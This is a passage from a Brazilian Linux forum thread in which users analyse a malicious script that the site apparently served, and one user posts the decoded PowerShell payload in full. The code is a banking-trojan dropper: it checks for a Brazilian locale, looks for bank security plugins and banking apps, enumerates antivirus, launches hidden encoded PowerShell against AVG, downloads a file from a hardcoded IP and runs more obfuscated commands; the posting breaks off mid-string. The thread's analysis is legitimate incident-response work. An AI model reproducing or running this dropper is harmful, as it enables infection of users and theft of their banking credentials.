Denuncie   Favoritos   Indicar  

01 02 03

Site vivaolinux solicitando download de arquivo [RESOLVIDO]

25. Re: Site vivaolinux solicitando download de arquivo [RESOLVIDO]

Fábio Berbert de Paula
fabio
(usa Debian)

Enviado em 24/11/2016 - 17:14h

andremilke escreveu:

Olá pessoal,
Dei uma analisada no script, verifiquei que a função DEGRADE, usa um objeto ActiveX para executar o conteúdo um arquivo compactado pelo powershell.

Cheguei até aqui, ainda não consegui descompactar o arquivo.


Se conseguir algo a mais informe aqui, estou juntando material pra tomar as devidas providências. Já tenho bastante informação.

0 0
  • Quote

    •   


    26. Re: Site vivaolinux solicitando download de arquivo [RESOLVIDO]

    ANDRE MILKE DOS SANTOS
    andremilke
    (usa Debian)

    Enviado em 25/11/2016 - 08:51h

    Blz.. pode deixar.

    0 0
  • Quote

    • 27. Re: Site vivaolinux solicitando download de arquivo [RESOLVIDO]

    ANDRE MILKE DOS SANTOS
    andremilke
    (usa Debian)

    Enviado em 25/11/2016 - 09:23h

    Olá,
    Consegui extrair o conteúdo daquela string compactada, quer que ti envie? Ou posto aqui?

    0 0
  • Quote

    • 28. Re: Site vivaolinux solicitando download de arquivo [RESOLVIDO]

    Perfil removido
    removido
    (usa Nenhuma)

    Enviado em 25/11/2016 - 09:37h

    andremilke escreveu:

    Olá,
    Consegui extrair o conteúdo daquela string compactada, quer que ti envie? Ou posto aqui?


    Olá Andre.

    Como tem permissão do Fabio, pode postar.
    VLW!

    0 0
  • Quote

    • 29. Re: Site vivaolinux solicitando download de arquivo [RESOLVIDO]

    ANDRE MILKE DOS SANTOS
    andremilke
    (usa Debian)

    Enviado em 25/11/2016 - 09:54h 


    
$ie = New-Object -com internetexplorer.application; 
    
$ie.visible = $true; 
    
$ie.navigate("");
    
$mtx = New-Object System.Threading.Mutex($false, "mtt")
    
if ($mtx.WaitOne(500)) {
    
if(-not (Test-Path "$env:APPDATA\$([char[]](77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,84,101,109,112,108,97,116,101,115,92,108,111,103,46,116,120,116) -join '')")){
    
	([char[]](87,105,110,100,111,119,115,32,119,111,114,107,105,110,103,32,110,111,114,109,97,108,108,121,44,32,105,103,110,111,114,101,32,116,104,105,115,32,108,111,103) -join '') >> "$env:APPDATA\$([char[]](77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,84,101,109,112,108,97,116,101,115,92,108,111,103,46,116,120,116) -join '')"
    
	if(((Get-Culture).Name.ToLower() -eq ([char[]](112,116,45,66,114) -join '').ToLower())) {
    
		$dir = (${env:ProgramFiles(x86)}, ${env:ProgramFiles} -ne $null)[0];
    
		$gbPath = Join-Path $dir ([char[]](71,98,80,108,117,103,105,110) -join '');
    
		$paths = @{(Join-Path $gbPath gbiehcef.dll) = "104";(Join-Path $gbPath gbiehscd.dll) = "751";(Join-Path $gbPath gbieh.dll) = "001";(Join-Path $gbPath gbiehuni.dll) = "341";(Join-Path ($env:ProgramFiles) "\AppBrad\NetExpress50.exe") = "APP237";(Join-Path ($env:ProgramFiles) Trusteer) = "Trust";(Join-Path ($env:LOCALAPPDATA) "\Aplicativo Itau\itauaplicativo.exe") = "APP341";};
    
		foreach ($path in $paths.GetEnumerator()) { if(Test-Path $($path.Name) ){ $V1 += $($path.Value) + ","}};
    
		$avs = (Get-WmiObject -Namespace ([char[]](114,111,111,116,92,83,101,99,117,114,105,116,121,67,101,110,116,101,114,50) -join '') -QUERY ([char[]](83,69,76,69,67,84,32,68,105,115,112,108,97,121,78,97,109,101,32,70,82,79,77,32,65,110,116,105,86,105,114,117,115,80,114,111,100,117,99,116) -join ''));
    
		foreach ($av1 in $avs) { $av += $av1.displayName + ","}; 
    
		if($av -like "*avg*"){
    
			Start-Process -WindowStyle Hidden powershell.exe -ArgumentList ([char[]](45,78,111,80,32,45,78,111,110,73,32,45,87,32,72,105,100,100,101,110,32,45,69,32,32,99,119,66,104,65,71,119,65,73,65,66,104,65,67,65,65,84,103,66,108,65,72,99,65,76,81,66,80,65,71,73,65,97,103,66,108,65,71,77,65,100,65,65,55,65,71,107,65,90,81,66,52,65,67,103,65,89,81,65,103,65,69,107,65,84,119,65,117,65,70,77,65,100,65,66,121,65,71,85,65,89,81,66,116,65,70,73,65,90,81,66,104,65,71,81,65,90,81,66,121,65,67,103,65,75,65,66,104,65,67,65,65,83,81,66,80,65,67,52,65,81,119,66,118,65,71,48,65,99,65,66,121,65,71,85,65,99,119,66,122,65,71,107,65,98,119,66,117,65,67,52,65,82,65,66,108,65,71,89,65,98,65,66,104,65,72,81,65,90,81,66,84,65,72,81,65,99,103,66,108,65,71,69,65,98,81,65,111,65,70,115,65,83,81,66,80,65,67,52,65,84,81,66,108,65,71,48,65,98,119,66,121,65,72,107,65,85,119,66,48,65,72,73,65,90,81,66,104,65,71,48,65,88,81,66,98,65,69,77,65,98,119,66,117,65,72,89,65,90,81,66,121,65,72,81,65,88,81,65,54,65,68,111,65,82,103,66,121,65,71,56,65,98,81,66,67,65,71,69,65,99,119,66,108,65,68,89,65,78,65,66,84,65,72,81,65,99,103,66,112,65,71,52,65,90,119,65,111,65,67,99,65,97,103,66,87,65,70,111,65,84,103,66,106,65,68,107,65,99,65,66,74,65,69,85,65,82,65,65,119,65,71,52,65,86,103,66,109,65,71,115,65,85,65,66,76,65,72,77,65,99,65,66,87,65,72,77,65,85,81,65,118,65,72,77,65,97,119,66,48,65,71,111,65,84,119,66,49,65,72,65,65,101,103,66,104,65,72,99,65,101,65,66,122,65,71,103,65,83,81,66,108,65,69,119,65,100,119,66,78,65,70,103,65,100,119,66,104,65,71,119,65,97,103,65,120,65,71,99,65,84,81,66,97,65,70,107,65,101,65,66,82,65,71,107,65,83,119,66,84,65,70,69,65,84,81,66,105,65,70,111,65,76,119,66,81,65,71,89,65,100,65,66,79,65,68,73,65,81,81,66,117,65,72,81,65,79,81,65,121,65,69,119,65,99,65,65,49,65,69,77,65,98,81,66,89,65,68,99,65,79,81,65,114,65,67,56,65,89,103,66,121,65,71,119,65,97,119,66,54,65,69,73,65,90,65,66,121,65,67,115,65,90,103,66,75,65,72,99,65,100,103,66,117,65,70,81,65,90,81,66,108,65,68,107,65,90,81,66,54,65,68,103,65,89,103,66,77,65,70,111,65,83,103,66,72,65,70,99,65,75,119,66,104,65,72,107,65,76,119,66,54,65,72,99,65,100,81,66,54,65,70,65,65,100,103,65,52,65,68,81,65,81,119,65,53,65,71,85,65,84,65,65,122,65,68,103,65,101,81,66,85,65,71,77,65,87,65,65,48,65,70,65,65,98,103,66,86,65,68,69,65,89,81,66,116,65,71,107,65,101,65,65,118,65,69,48,65,83,65,66,73,65,72,77,65,86,103,66,79,65,72,81,65,99,65,66,115,65,68,77,65,75,119,66,84,65,72,65,65,98,65,66,78,65,71,81,65,84,119,65,52,65,69,89,65,101,81,66,122,65,70,81,65,81,119,66,75,65,70,85,65,76,119,66,88,65,71,77,65,85,119,66,115,65,71,107,65,99,81,66,67,65,72,111,65,85,103,66,76,65,69,52,65,81,119,66,72,65,71,52,65,81,119,66,51,65,72,99,65,97,81,66,71,65,70,77,65,84,81,66,74,65,68,103,65,86,103,66,88,65,72,73,65,84,65,66,111,65,72,65,65,84,103,66,54,65,70,65,65,98,81,65,51,65,68,65,65,89,119,66,74,65,69,77,65,75,119,66,66,65,69,56,65,84,103,66,71,65,71,69,65,87,103,66,104,65,70,103,65,89,119,66,68,65,69,52,65,84,81,66,79,65,69,99,65,83,81,65,48,65,69,115,65,77,65,66,51,65,69,115,65,84,65,66,72,65,69,89,65,101,103,65,118,65,71,81,65,99,81,66,113,65,68,103,65,87,103,66,82,65,71,52,65,99,81,66,122,65,69,77,65,90,103,66,119,65,70,65,65,77,119,66,67,65,69,89,65,90,103,66,54,65,68,77,65,85,65,66,81,65,67,115,65,101,103,66,83,65,69,99,65,76,119,66,85,65,68,69,65,101,103,65,122,65,69,69,65,99,103,66,119,65,70,85,65,84,119,66,54,65,70,73,65,99,81,66,68,65,69,107,65,79,81,66,52,65,72,99,65,100,81,66,80,65,70,111,65,75,119,66,73,65,71,85,65,98,65,65,121,65,72,89,65,83,103,65,53,65,69,81,65,79,65,66,51,65,68,99,65,100,119,66,83,65,68,77,65,97,103,66,66,65,71,56,65,99,119,66,54,65,68,81,65,81,103,66,115,65,71,69,65,85,65,66,111,65,68,99,65,100,81,66,79,65,69,89,65,84,65,65,48,65,67,115,65,85,119,66,50,65,71,85,65,85,81,66,81,65,69,52,65,78,81,66,113,65,71,89,65,82,103,65,51,65,69,73,65,81,119,66,122,65,69,48,65,85,119,65,120,65,70,89,65,82,65,65,52,65,69,48,65,83,119,66,113,65,71,103,65,98,65,66,49,65,72,81,65,78,119,66,49,65,69,77,65,77,81,66,69,65,72,89,65,97,103,66,67,65,68,85,65,84,81,66,67,65,69,119,65,79,65,66,72,65,68,81,65,77,81,66,81,65,72,69,65,82,119,66,108,65,71,56,65,97,65,66,108,65,70,73,65,101,65,65,49,65,70,103,65,90,119,66,76,65,72,65,65,90,103,65,48,65,72,99,65,97,81,66,107,65,69,99,65,90,103,66,90,65,69,107,65,77,103,66,89,65,72,89,65,84,103,66,49,65,68,65,65,84,65,66,113,65,69,69,65,100,65,66,75,65,70,77,65,79,65,66,105,65,71,99,65,90,119,66,69,65,69,52,65,87,81,66,108,65,70,103,65,87,81,66,111,65,71,99,65,83,103,66,109,65,71,111,65,77,65,66,112,65,71,111,65,77,119,66,79,65,68,81,65,82,81,65,49,65,68,81,65,86,65,65,52,65,72,81,65,89,81,66,83,65,70,99,65,99,119,66,80,65,68,107,65,87,81,66,111,65,68,65,65,77,119,65,118,65,69,77,65,77,119,65,122,65,70,103,65,85,65,66,110,65,72,65,65,83,103,66,119,65,69,99,65,78,103,66,83,65,70,77,65,84,81,66,114,65,68,99,65,97,103,66,78,65,68,103,65,99,81,66,87,65,69,56,65,99,103,66,115,65,69,119,65,79,81,66,79,65,72,65,65,82,103,66,90,65,69,107,65,83,81,66,112,65,72,107,65,77,65,66,116,65,72,65,65,83,103,66,50,65,70,77,65,100,119,66,50,65,67,56,65,85,103,66,118,65,68,89,65,84,119,66,87,65,71,99,65,77,119,66,53,65,69,103,65,97,119,66,73,65,68,85,65,78,81,66,77,65,70,85,65,98,119,66,122,65,70,107,65,90,65,66,89,65,70,107,65,99,81,65,51,65,70,89,65,81,119,66,70,65,69,99,65,84,65,66,97,65,68,85,65,77,119,65,53,65,71,69,65,78,81,66,89,65,70,107,65,100,119,66,106,65,68,73,65,83,103,65,52,65,68,85,65,86,103,65,49,65,72,103,65,98,65,66,120,65,70,89,65,99,81,66,77,65,71,85,65,83,81,65,53,65,72,99,65,81,81,65,118,65,71,119,65,82,65,65,48,65,72,65,65,82,65,66,83,65,67,115,65,87,81,66,114,65,71,119,65,89,119,66,107,65,71,77,65,98,65,65,53,65,68,65,65,82,81,65,53,65,68,85,65,86,65,66,69,65,71,81,65,83,65,66,75,65,70,69,65,100,119,66,122,65,72,69,65,83,81,65,119,65,68,89,65,83,65,66,107,65,70,85,65,97,119,65,118,65,67,115,65,77,81,66,105,65,70,65,65,83,119,65,118,65,69,111,65,85,81,66,120,65,69,81,65,90,65,65,49,65,71,89,65,98,119,66,70,65,70,103,65,85,81,66,116,65,72,89,65,101,81,66,119,65,69,69,65,75,119,66,90,65,68,99,65,100,119,66,119,65,69,81,65,99,103,66,85,65,68,89,65,97,81,66,121,65,72,65,65,98,103,66,89,65,70,69,65,100,119,66,69,65,71,103,65,83,119,65,122,65,71,99,65,85,119,65,120,65,68,81,65,78,81,66,86,65,72,99,65,98,103,66,50,65,72,81,65,86,81,66,113,65,68,73,65,85,119,66,48,65,67,56,65,81,119,65,118,65,70,73,65,87,103,66,67,65,71,107,65,85,103,66,69,65,68,99,65,77,81,66,71,65,71,85,65,100,65,65,50,65,72,77,65,100,103,65,122,65,70,99,65,83,119,66,112,65,69,77,65,100,103,66,84,65,70,107,65,97,119,66,81,65,68,85,65,81,119,66,89,65,68,85,65,98,103,65,48,65,68,85,65,79,81,66,116,65,70,65,65,83,119,65,122,65,67,115,65,83,119,65,53,65,69,89,65,90,103,66,115,65,70,65,65,78,119,65,122,65,70,65,65,89,81,66,54,65,72,103,65,89,103,65,50,65,69,115,65,84,65,65,120,65,71,73,65,100,119,65,50,65,70,73,65,90,81,66,106,65,68,65,65,77,103,65,53,65,72,111,65,97,103,66,84,65,71,89,65,101,81,66,72,65,69,119,65,82,119,66,50,65,69,103,65,100,103,66,88,65,70,85,65,78,81,65,50,65,69,115,65,85,65,65,48,65,69,77,65,97,119,66,70,65,70,69,65,78,81,65,49,65,72,107,65,89,103,65,52,65,71,107,65,75,119,65,51,65,71,77,65,97,65,66,85,65,67,56,65,82,103,66,81,65,69,77,65,99,81,65,50,65,69,89,65,90,103,66,120,65,71,115,65,100,103,66,72,65,68,107,65,77,65,66,48,65,71,77,65,99,119,66,80,65,68,81,65,101,65,66,83,65,69,89,65,90,103,66,109,65,70,107,65,79,81,65,52,65,72,77,65,85,65,65,52,65,71,52,65,89,103,66,118,65,68,89,65,78,119,66,113,65,71,107,65,82,65,66,51,65,71,52,65,98,119,66,119,65,70,65,65,90,119,66,68,65,72,69,65,79,81,65,114,65,72,65,65,82,65,65,51,65,69,69,65,79,65,66,54,65,69,77,65,81,81,65,50,65,69,77,65,81,103,65,52,65,70,69,65,75,119,66,105,65,72,103,65,89,119,66,113,65,71,52,65,101,65,66,54,65,69,81,65,78,81,66,76,65,72,89,65,86,103,66,81,65,71,85,65,82,103,66,52,65,67,115,65,78,81,66,117,65,69,115,65,90,81,66,52,65,68,99,65,86,119,66,79,65,69,52,65,76,119,66,70,65,69,56,65,79,81,66,82,65,72,81,65,101,65,66,71,65,72,69,65,90,119,66,80,65,72,89,65,97,81,66,107,65,69,81,65,86,119,66,90,65,67,115,65,90,103,66,49,65,71,119,65,98,103,66,53,65,71,119,65,85,65,66,118,65,68,107,65,75,119,66,114,65,72,111,65,99,103,66,116,65,68,85,65,81,119,65,122,65,70,65,65,83,65,65,114,65,71,52,65,82,65,66,108,65,71,77,65,85,81,65,52,65,69,115,65,76,119,66,121,65,68,65,65,77,65,66,107,65,68,89,65,84,65,66,87,65,69,111,65,100,65,65,53,65,69,103,65,86,103,66,71,65,68,77,65,79,65,66,86,65,71,48,65,85,65,66,108,65,70,103,65,101,65,66,105,65,68,99,65,78,65,66,104,65,68,81,65,98,119,66,122,65,68,103,65,98,65,66,50,65,69,107,65,97,103,66,52,65,70,99,65,76,119,66,76,65,70,103,65,90,103,66,110,65,72,73,65,90,103,66,76,65,68,103,65,87,103,66,107,65,69,48,65,99,103,65,51,65,70,65,65,90,81,66,52,65,69,107,65,100,103,66,107,65,70,99,65,99,103,65,50,65,70,69,65,84,119,66,90,65,71,119,65,87,103,66,52,65,68,65,65,82,65,66,54,65,72,73,65,90,103,66,118,65,68,65,65,89,103,66,71,65,68,107,65,82,103,65,118,65,68,107,65,82,81,66,104,65,71,115,65,98,65,65,114,65,68,81,65,100,81,66,106,65,72,103,65,79,81,65,48,65,69,81,65,86,81,66,118,65,70,111,65,98,65,66,81,65,68,89,65,97,81,66,113,65,72,65,65,101,81,66,52,65,68,99,65,98,103,66,51,65,68,81,65,76,119,66,114,65,72,89,65,90,65,66,82,65,72,81,65,100,103,66,111,65,72,103,65,81,81,65,48,65,71,99,65,86,103,66,81,65,68,85,65,100,103,66,49,65,69,111,65,100,103,66,119,65,71,48,65,101,81,66,85,65,72,85,65,98,81,66,77,65,68,89,65,82,103,66,105,65,72,107,65,87,65,66,115,65,72,85,65,99,103,66,74,65,70,103,65,86,81,66,84,65,72,89,65,101,103,66,51,65,72,111,65,101,103,65,49,65,68,73,65,90,65,65,49,65,72,107,65,83,65,66,117,65,70,107,65,98,119,66,88,65,68,89,65,85,103,66,54,65,68,107,65,77,81,66,88,65,71,73,65,76,119,66,78,65,70,73,65,86,81,66,104,65,71,81,65,101,65,65,48,65,72,111,65,101,103,66,77,65,69,115,65,79,65,65,50,65,71,89,65,84,81,65,122,65,68,103,65,100,65,65,114,65,72,103,65,97,103,66,112,65,67,56,65,77,65,66,78,65,72,73,65,81,103,65,51,65,71,52,65,77,119,66,69,65,69,48,65,97,103,65,114,65,71,119,65,89,103,66,112,65,71,103,65,100,103,66,84,65,70,111,65,78,81,66,67,65,71,48,65,86,103,65,50,65,71,103,65,99,119,65,52,65,71,85,65,79,65,65,114,65,68,69,65,89,119,66,52,65,69,111,65,101,65,66,85,65,71,119,65,99,103,66,86,65,68,81,65,100,119,66,76,65,69,52,65,97,81,66,81,65,72,103,65,83,65,65,53,65,69,99,65,83,65,66,77,65,67,115,65,99,103,65,118,65,69,111,65,75,119,66,86,65,72,103,65,87,81,66,115,65,67,56,65,97,103,65,52,65,71,48,65,87,65,66,81,65,71,77,65,99,119,65,122,65,68,73,65,83,103,65,121,65,69,56,65,89,119,65,50,65,67,115,65,85,81,65,51,65,72,65,65,83,119,65,118,65,69,99,65,101,65,65,48,65,69,103,65,75,119,66,110,65,71,111,65,101,103,66,49,65,68,73,65,98,103,66,119,65,69,73,65,79,81,66,49,65,71,48,65,86,119,65,53,65,69,48,65,98,119,66,108,65,70,103,65,78,81,66,68,65,67,56,65,79,81,65,122,65,70,65,65,83,103,66,108,65,71,48,65,76,119,66,48,65,69,85,65,75,119,66,112,65,67,56,65,79,81,66,88,65,69,119,65,83,119,65,114,65,69,52,65,100,81,66,107,65,70,73,65,75,119,66,112,65,69,89,65,78,119,66,106,65,72,77,65,84,65,65,49,65,69,89,65,100,103,65,121,65,68,99,65,77,81,66,70,65,71,81,65,79,65,66,89,65,72,107,65,84,81,66,50,65,69,56,65,100,119,65,118,65,70,77,65,99,65,66,54,65,71,73,65,79,81,66,77,65,69,103,65,99,81,66,77,65,68,99,65,100,119,66,77,65,72,69,65,84,65,65,118,65,72,89,65,77,81,66,114,65,72,89,65,90,119,66,77,65,67,115,65,98,65,66,50,65,68,103,65,84,81,66,68,65,71,119,65,82,103,66,81,65,68,103,65,98,65,66,50,65,71,77,65,86,81,66,82,65,71,89,65,99,103,66,97,65,69,103,65,81,81,66,89,65,71,85,65,82,81,66,121,65,72,85,65,84,103,65,114,65,69,56,65,75,119,65,118,65,71,107,65,100,119,65,49,65,72,99,65,99,103,66,112,65,68,73,65,83,65,65,119,65,72,65,65,79,81,66,90,65,72,77,65,85,65,66,79,65,68,77,65,89,81,66,49,65,71,56,65,100,103,65,53,65,68,89,65,84,65,65,51,65,68,89,65,85,119,66,106,65,68,103,65,99,103,65,53,65,68,89,65,79,81,66,109,65,70,69,65,97,81,66,88,65,70,69,65,76,119,66,108,65,71,52,65,89,103,65,118,65,70,65,65,97,65,65,51,65,71,52,65,99,119,66,113,65,72,111,65,100,81,65,120,65,70,99,65,90,103,66,72,65,68,77,65,86,119,66,111,65,72,77,65,78,65,66,75,65,70,107,65,87,81,66,114,65,68,69,65,90,103,66,69,65,72,111,65,98,65,66,109,65,69,52,65,78,119,66,116,65,67,115,65,99,103,66,110,65,68,103,65,77,103,66,54,65,72,77,65,98,103,66,79,65,69,56,65,90,103,66,87,65,67,56,65,101,65,66,81,65,70,65,65,99,81,66,48,65,70,81,65,99,103,65,49,65,68,107,65,82,119,66,53,65,67,56,65,79,65,66,74,65,68,107,65,86,81,65,118,65,71,89,65,97,103,65,53,65,70,99,65,78,119,66,77,65,70,65,65,82,81,65,114,65,70,103,65,89,103,66,109,65,71,99,65,100,103,66,48,65,68,73,65,97,65,66,106,65,72,73,65,78,119,66,54,65,67,115,65,76,119,66,108,65,71,52,65,98,81,66,54,65,71,48,65,101,65,66,90,65,69,52,65,79,65,65,114,65,69,77,65,99,103,66,67,65,71,111,65,86,65,66,49,65,68,103,65,98,103,66,50,65,70,103,65,86,65,65,114,65,68,89,65,83,119,66,106,65,70,111,65,77,103,66,105,65,71,48,65,101,65,66,50,65,69,48,65,79,65,66,79,65,67,56,65,98,65,66,122,65,71,52,65,87,81,66,109,65,68,77,65,101,81,65,53,65,71,111,65,84,81,65,51,65,69,81,65,90,65,66,50,65,71,119,65,98,81,65,49,65,69,48,65,84,81,66,113,65,72,81,65,75,119,66,77,65,70,77,65,99,119,66,84,65,72,89,65,89,103,66,52,65,68,77,65,86,65,66,114,65,68,103,65,89,103,66,119,65,72,69,65,90,119,65,121,65,68,85,65,86,81,66,50,65,70,111,65,101,103,66,108,65,70,73,65,77,81,66,87,65,72,85,65,101,81,66,107,65,71,69,65,99,65,66,108,65,70,107,65,81,103,65,114,65,70,73,65,99,81,66,108,65,68,99,65,78,65,65,121,65,70,81,65,100,81,66,87,65,68,65,65,87,81,66,108,65,68,99,65,98,103,65,121,65,68,99,65,90,119,65,48,65,72,69,65,79,65,66,110,65,71,52,65,84,81,66,122,65,72,89,65,85,119,66,69,65,69,99,65,82,119,66,52,65,70,81,65,81,103,66,80,65,71,52,65,84,65,65,53,65,71,103,65,83,103,66,70,65,71,85,65,76,119,66,107,65,69,52,65,81,119,66,116,65,70,99,65,101,81,66,107,65,71,69,65,89,119,66,80,65,70,89,65,87,65,66,54,65,72,111,65,86,65,66,115,65,69,111,65,100,65,66,117,65,69,89,65,79,65,65,53,65,72,89,65,77,119,66,79,65,72,85,65,78,119,66,107,65,72,81,65,86,81,65,120,65,72,73,65,99,119,66,71,65,72,111,65,85,81,65,118,65,72,111,65,86,81,66,77,65,71,111,65,76,119,66,81,65,70,65,65,82,119,66,108,65,70,103,65,98,103,66,52,65,69,48,65,75,119,66,114,65,72,103,65,86,81,66,109,65,68,69,65,98,103,66,118,65,72,81,65,82,81,65,52,65,68,77,65,97,65,66,121,65,71,52,65,78,81,66,80,65,70,103,65,99,103,66,89,65,71,52,65,77,103,65,49,65,69,56,65,79,81,66,111,65,72,89,65,97,103,66,75,65,69,48,65,87,65,65,121,65,70,81,65,83,119,66,75,65,70,103,65,97,65,66,72,65,71,81,65,101,103,66,121,65,71,69,65,98,119,66,48,65,71,107,65,86,119,66,48,65,68,103,65,75,119,66,81,65,71,81,65,86,119,66,52,65,70,65,65,98,103,65,49,65,72,73,65,100,65,65,49,65,70,99,65,97,65,66,90,65,67,56,65,99,81,66,75,65,69,81,65,87,103,66,68,65,71,77,65,86,103,66,107,65,71,48,65,87,65,66,86,65,70,65,65,85,119,66,117,65,68,69,65,83,103,66,115,65,68,103,65,98,81,66,111,65,72,99,65,99,119,66,81,65,71,89,65,77,65,65,51,65,67,115,65,79,65,66,97,65,69,119,65,90,103,66,78,65,68,65,65,98,81,66,82,65,72,81,65,77,81,65,118,65,68,89,65,75,119,66,50,65,71,103,65,87,81,65,49,65,67,56,65,82,65,66,83,65,71,85,65,82,119,66,73,65,72,89,65,76,119,66,48,65,69,103,65,84,65,65,48,65,69,119,65,78,103,66,75,65,72,107,65,83,103,66,119,65,70,99,65,78,81,66,69,65,68,103,65,100,65,65,48,65,70,107,65,86,119,66,78,65,72,69,65,84,65,65,49,65,71,111,65,79,65,66,50,65,68,81,65,83,103,66,68,65,68,107,65,98,119,66,48,65,68,85,65,86,103,66,119,65,69,73,65,90,119,66,104,65,70,65,65,83,103,66,106,65,70,77,65,83,81,66,114,65,72,77,65,81,103,66,52,65,69,89,65,76,119,66,85,65,71,89,65,78,81,65,50,65,72,73,65,101,65,65,52,65,71,73,65,99,119,65,122,65,69,99,65,99,81,66,109,65,70,73,65,84,119,66,116,65,72,107,65,85,119,66,75,65,68,77,65,84,65,66,122,65,71,52,65,101,81,65,121,65,69,115,65,97,103,66,49,65,67,56,65,77,103,66,119,65,71,52,65,78,81,66,105,65,69,52,65,101,103,66,104,65,69,52,65,78,119,66,66,65,68,85,65,84,81,66,88,65,72,103,65,87,65,66,105,65,68,103,65,81,81,66,117,65,69,81,65,98,103,66,109,65,71,85,65,77,103,66,104,65,71,81,65,78,119,66,122,65,72,103,65,85,103,65,114,65,68,69,65,75,119,66,52,65,72,69,65,101,103,65,119,65,70,81,65,89,103,66,121,65,70,65,65,89,119,66,73,65,69,111,65,87,65,65,51,65,68,103,65,90,103,66,115,65,71,89,65,74,119,65,112,65,67,119,65,87,119,66,74,65,69,56,65,76,103,66,68,65,71,56,65,98,81,66,119,65,72,73,65,90,81,66,122,65,72,77,65,97,81,66,118,65,71,52,65,76,103,66,68,65,71,56,65,98,81,66,119,65,72,73,65,90,81,66,122,65,72,77,65,97,81,66,118,65,71,52,65,84,81,66,118,65,71,81,65,90,81,66,100,65,68,111,65,79,103,66,69,65,71,85,65,89,119,66,118,65,71,48,65,99,65,66,121,65,71,85,65,99,119,66,122,65,67,107,65,75,81,65,115,65,70,115,65,86,65,66,108,65,72,103,65,100,65,65,117,65,69,85,65,98,103,66,106,65,71,56,65,90,65,66,112,65,71,52,65,90,119,66,100,65,68,111,65,79,103,66,66,65,70,77,65,81,119,66,74,65,69,107,65,75,81,65,112,65,67,52,65,85,103,66,108,65,71,69,65,90,65,66,85,65,71,56,65,82,81,66,117,65,71,81,65,75,65,65,112,65,65,61,61) -join '') -wait;
    
			while((get-service -Name ([char[]](97,118,103,119,100) -join '')).Status -eq ([char[]](82,117,110,110,105,110,103) -join '')) {Start-Sleep -Seconds 10;}
    
		}
    
		$ps = (Get-ChildItem ([char[]](72,75,76,77,58,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,78,69,84,32,70,114,97,109,101,119,111,114,107,32,83,101,116,117,112,92,78,68,80) -join '') -recurse | Get-ItemProperty -name Version,Release -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select Version | Sort-Object Version –Descending)[0].Version;
    
		if(Test-Path $(Join-Path $dir ([char[]](87,105,110,82,65,82) -join ''))){
    
			$wr = ([char[]](46,58,87,105,110,114,97,114) -join '')
    
		}
    
		if($v1) {
    
			$durl = "http://130.211.157.13/artw/COF267F9415EF3518C.cab"
    
			$ll = "COF267F9415EF3518C.cab"
    
			$output = "$env:APPDATA\$([char[]](77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,84,101,109,112,108,97,116,101,115,92) -join '')" + $ll;
    
			(New-Object System.Net.WebClient).DownloadFile($durl, $output);
    
			Start-Process -WindowStyle Hidden  powershell.exe -ArgumentList "-NoP -NonI -W Hidden -E cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAeABWAE4ATABqADUAcwB3AEUARAA1AHYAcABQAHcASABIAHkASQBsAFUAVQAyAEYAQQBmAFAAWQBxAG8AYwBXAGgAYQBvADkAWgBLAFAATgBxAHAAYwBvAEIAdwBxAHoARABSAFcAUAAxAEQAagBaAGoAZABMADkANwAvAFcATABRAE4AUwBWAGUAdQBpAGgARQBnAGEAagBHAGMAOQA4AEQAOAA4AGsAegA5AEYANwBOAEkAMwB2AEUAcwBjAFAAawBzAGcAagBkAEoARwA0AGwASQBUAHgAMgB5AHoAOQBoAG0ATQAzAG8AWQB1AFAAaQA1AGgATQAzADQAMQBIAGsANgB5AHAAcQByAFMAVwArAGIATgBOAHQAawB2AFoAWgByAHUAZAArAFEARwBtAEkAWQA0AGMASABBAGEAWQAyAEIAUQBUAFkAbwB1AHYAVwBJAFMASQBGAFkAbABGAFYAZABUAEYAeABDAEgAcQBqAHgAQgBmAFoASQBpADkASABXAEYASwBNAEwAVgBsAFAASQByAFUAdgB6AHoAcABtAGIAQgBqAHEANgAvAHIAWQBDACsAUQBjAGIARQBoAHgATwBrAEwAeQB4AHoAaQA2AFoASwAyAFoAMABxAEcAYQB2ADEAWgBRAG0AYwBHAFAAVAB5AFQAcQBRAEcASQBCAE4AYwBjAGsAWABFAFMAUwBrADQAKwB4AGEARQB0AEgAMQAvAHYAUABmAGsAVwBVAEEATgBOAFYAQwBKAFcAUgBUAHQAVwBzAHIAMgBqADIAUAAxAGQARABlACsAaQBnAEsASQBrAGcARQBSAEIATAA0AHgASwBtAGkAUAByAFIAMQBQAFUAYQBEAHEAZABvAHoAZABvAGsAdQBmAFMAZwBYADMASwBkADEAZgB5AEIAdwBJAFAAeABjAEsARQBrAEgAWQArAHUARgBkAFkAWgBGAGQAVgBXADcAYwBVAEMAWAA3AFEATgA2AFIARwB2AHEANgBwAGcAYQBUAFoAeQBRAHEAUwBnADUASgBLAEgAWAAxAE4ANgA2AGkAegB4AEwAawBJAGEAUAB3AGsAaABxAEYAdABFAEMAZwBwAEIAcgBRAEUAbwBlAEkAUgB6AFcAYQBmAGcARgB1AGYATwBWAFEAcgAxAHUAeQBCADgAUgBPAHkAVgBwAEsAbQBKAG0AcwB0ADAAdwBvAEcAaABEADMAbABoAHcAYgBnADYATABxAGEAagB5AFQAcgBrAGEARgBxADEAbwBLAHgAaABuADMASQBlAE4ASABVAGEARgAyAFUAVQBQAFAAeQBGAEQAYwAxAEwAKwBvAEQAaQBEAEQAOABSAEoAUAA2AFUASgBiAHoAOAA4ADEANAB0AEkAUQBuAEIAYQBKAHIAbQB6AFEAcwBBAC8AVAByAEIAbgBXAEIASAB0ADAALwBJAFAAcQBhAGwAZwBkAEEAbAAwAEcAeQB1AHEASQBQAHAAegAyAGcAbAByAE8AaQAvAG4ANQBwAGoAZQA0AE8AMwBGAG8ASwBmAE8AaABsAFAASQBLAHkAaABUAE0AOABGAC8AeABGAFgAZwBNADQAQwBpADcASABKADcAYg